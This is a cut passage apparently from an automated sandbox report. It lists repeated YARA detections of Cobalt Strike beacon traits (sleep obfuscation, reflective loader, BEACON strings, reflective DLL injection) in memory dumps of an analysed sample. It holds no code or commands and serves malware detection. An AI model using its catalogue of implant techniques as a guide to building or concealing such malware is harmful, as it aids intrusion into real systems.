Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2009609332.00000215D7880000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2009609332.00000215D7880000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2009609332.00000215D7880000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2009609332.00000215D7880000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2009592329.00000215D7805000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2009574337.00000215D77FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3255937250.00000217D9E50000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.3255937250.00000217D9E50000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2008825010.00000215D77DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2008825010.00000215D77DA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2009488257.00000215D77FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2008952668.00000215D77DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2008952668.00000215D77DA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3255064017.00000215D7A0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2009609332.00000215D78F4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2009609332.00000215D78F4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2009609332.00000215D78F4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2009284243.00000215D77F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2008238134.00000215D7880000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2008238134.00000215D7880000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2008238134.00000215D7880000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2007898810.00000215D7757000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2008238134.00000215D7880000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2008238134.00000215D78F4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2008238134.00000215D78F4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2008238134.00000215D78F4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2009131449.00000215D77E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2009131449.00000215D77E5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2009082132.00000215D77DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2009082132.00000215D77DB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for 